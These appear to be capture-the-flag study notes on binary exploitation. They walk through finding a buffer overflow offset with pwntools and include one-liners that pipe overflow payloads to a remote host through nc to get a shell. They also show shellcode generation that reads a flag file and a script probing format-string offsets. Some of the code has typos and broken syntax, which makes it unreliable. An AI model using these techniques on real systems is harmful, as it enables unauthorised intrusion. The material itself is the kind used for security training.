Challenges

https://drive.google.com/file/d/1xt4hEbcnN77rdxXPtbHXNDGdR0ZGPRzW/view?usp=sharing

Buffer Overflow

• Check file info: file pwnme

• Check Strings: strings pwnme

• Use checksec, ltrace and strace

• Try ghidra or IDA to decompile: Start from main and go through the string

int main(int ac, char** av)

• try readelf -s (grep -i "Func" for filter)

• Get segmentation fault and check address : sudo dmesg | tail

• Use pwn tool: pwn cyclick (address) then echo "output" | ./file and then pwn cyclik -l 0Xoutput

to get hex value, pwn.p32(address)

• Try to get Segmentation Fault (bufferoverflow with sth like: python -c "print 'A'*100 + 'BB'" | ./file ) and observe dmesg | tail

• To loop this process, for i in {20..28}; do echo $i; python -c "print 'A'*$i+'hexvalue'" | ./file ; done

• To get shell, (python -c "print 'A'*20 + 'hexvalue'"; cat) | nc pwn.file.com 1337

• get flag directly, import pwn > pwn.asm(pwn.shellcraft.i386.linux.cat('flag.txt'))

python -c "print 'output'" | ./file

• Find out the buffer starting value then replace BB with the hex value obtained

Automation

#!/usr/bin/env python

from pwn import *

context.log_level='critical'

s=remote('file.ctf.org', 1337)

print s.recv()

for i in range(8):

s.sendline('A anything')

s.sendline('A '+'2'*8)

s.sendline('F')

print s.recv()

print s.recv()

s.close()

Little modified one:

#!/usr/bin/env python

from pwn import *

host, port='file.ctf.org', 1337

for i inrange(10):

s=remote(host, port)

s.recvuntil('>')

s.sendline('%'+str(i)+ '$s')

response=s.recv()

if ('dumped core' in response):

print "segfault"

else:

print.response

s.close()